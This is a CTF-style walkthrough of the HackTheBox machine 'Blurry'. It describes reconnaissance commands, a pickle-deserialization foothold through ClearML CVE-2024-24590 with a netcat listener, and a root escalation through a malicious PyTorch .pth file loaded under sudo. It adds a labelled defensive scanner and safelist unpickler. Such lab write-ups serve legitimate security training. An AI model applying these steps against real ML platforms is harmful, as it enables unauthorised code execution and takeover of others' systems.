June 14, 2024 · HackTheBox · Linux · Medium · CVE-2024-24590 · ClearML · PyTorch · 10 min read
Blurry starts with subdomain enumeration revealing a ClearML MLOps platform at app.blurry.htb. After registering and configuring the SDK, we exploit CVE-2024-24590 (unsafe pickle deserialization on artifact load) for a foothold as jippity. Root is reached by crafting a malicious PyTorch model (.pth) that exploits a misconfigured sudo rule — evaluate_model calls torch.load(), triggering a second deserialization as root.
Initial scan finds SSH and an nginx web server that immediately redirects to app.blurry.htb.
nmap — initial scan
SP1R4@kali)-[~/HTB/blurry]└$ nmap -sV -sC -oN nmap.txt 10.10.11.19
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to http://app.blurry.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
hosts — add entries
echo "10.10.11.19 app.blurry.htb files.blurry.htb chat.blurry.htb api.blurry.htb blurry.htb" | sudo tee -a /etc/hosts
Subdomain Enumeration
gobuster dns
SP1R4@kali)-[~/HTB/blurry]└$ gobuster dns -d "blurry.htb" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
Found: files.blurry.htb
Found: app.blurry.htb
Found: chat.blurry.htb
chat.blurry.htb — Rocket.Chat
Browsing the Rocket.Chat instance after registering reveals team conversations.
The admin user is jippity and the team is building AI tooling — useful context for what runs on app.blurry.htb.
app.blurry.htb — ClearML
ClearML is an open-source MLOps platform for tracking AI/ML experiments. Registration only asks for a name; submitting any name grants developer access and provides API credentials. api.blurry.htb must be in /etc/hosts before running the SDK init.
clearml — setup
pip install virtualenv && python3 -m venv .env && source .env/bin/activate
pip install clearml
clearml-init
# paste the config from the web UI settings page when prompted
Searching for known ClearML CVEs surfaces a batch of disclosures from early 2024. The one that matters for us:
| CVE | Description | Used |
| --- | --- | --- |
| CVE-2024-24590 | Pickle Load on Artifact Get — unsafe deserialization | ✓ foothold |
| CVE-2024-24591 | Path Traversal on File Download | — |
| CVE-2024-24592 | Improper Auth → Arbitrary Read-Write | — |
| CVE-2024-24593 | CSRF in ClearML Server | — |
| CVE-2024-24594 | XSS via HTML rendering | — |
| CVE-2024-24595 | Plaintext creds in MongoDB | — |
When a ClearML agent processes a task, it downloads the artifact and calls pickle.load() without validation. By crafting an object with a malicious __reduce__ method, we execute arbitrary code the moment the agent picks up our task.
Foothold
CVE-2024-24590 — Pickle Deserialization
We create a class whose __reduce__ returns a reverse shell command, upload it as a ClearML artifact tagged review, and queue it. The admin agent executes it automatically.
# Start listener before running the exploit
nc -lvnp 4444
# Once connected — stabilize
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# Ctrl+Z
stty raw -echo; fg
jippity@blurry:~$
🚩 Shell as jippity. User flag captured.
Privilege Escalation
sudo -l
sudo permissions
jippity@blurry:~$ sudo -l
User jippity may run the following commands on blurry:
(root) NOPASSWD: /usr/bin/evaluate_model /models/*.pth
The evaluate_model script loads model files with torch.load() — which internally calls pickle.load(). We also have write access to /models/:
check /models permissions
jippity@blurry:~$ ls -la / | grep models
drwxrwxr-x 2 root jippity 4096 Jun 13 13:32 models
ⓘ torch.load() == pickle.load() — PyTorch .pth files are pickle-serialized objects. Any class with a custom __reduce__ will execute arbitrary code on load.
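Defender-side illustration of both deserialization sinks in this box (the ClearML artifact load and torch.load() in evaluate_model), added here and not part of the original writeup: a scanner that lists code-reaching pickle opcodes without executing the stream, and an Unpickler whose find_class enforces a safelist, which is the same idea behind torch.load(weights_only=True). The safelist contents, the Gadget class and the sample pickles are constructed for the example; the gadget calls the harmless sorted() in place of a shell.

```python
import io
import pickle
import pickletools
from collections import OrderedDict

# Opcodes through which a pickle reaches back into the interpreter: importing
# a global (the entry point every __reduce__ gadget needs) or calling it.
CODE_REACHING_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
                         "NEWOBJ", "NEWOBJ_EX", "BUILD"}

# Hypothetical safelist for this example; a real loader lists only the tensor
# and container types its models need (torch.load(weights_only=True) ships one).
SAFE_GLOBALS = {("collections", "OrderedDict")}

def scan_pickle(data: bytes) -> list:
    """List code-reaching opcodes in a pickle stream without executing it."""
    return [op.name for op, _arg, _pos in pickletools.genops(data)
            if op.name in CODE_REACHING_OPCODES]

class SafelistUnpickler(pickle.Unpickler):
    """Every global lookup goes through find_class; refuse anything unlisted."""
    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")

def try_safe_load(data: bytes):
    """Return (True, object) or (False, reason) rather than raising."""
    try:
        return True, SafelistUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError as exc:
        return False, str(exc)

def unrestricted_load(data: bytes):
    """What a plain torch.load()/pickle.load() does: trust the whole stream."""
    return pickle.loads(data)

class Gadget:
    """Constructed stand-in for the artifact in the writeup: __reduce__ names a
    callable that runs at load time. Harmless sorted() here instead of a shell."""
    def __reduce__(self):
        return (sorted, ([3, 1, 2],))

# Constructed sample "model files"; protocol 4 pinned so the opcodes are stable.
PLAIN_STATE_DICT = pickle.dumps({"w": [0.1, 0.2]}, protocol=4)
ORDERED_STATE = OrderedDict(w=[0.1, 0.2])
ORDERED_STATE_DICT = pickle.dumps(ORDERED_STATE, protocol=4)  # legit, yet has REDUCE
GADGET = pickle.dumps(Gadget(), protocol=4)
```

Note that the opcode scan flags the legitimate OrderedDict state dict exactly as it flags the gadget, because any pickled class instance imports a global; scanning is a triage signal, while the find_class safelist is the control that actually decides what may be materialised.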
Malicious PyTorch Model
We craft a model class that overrides __reduce__ with a reverse shell, save it as a .pth file, and drop it into /models/.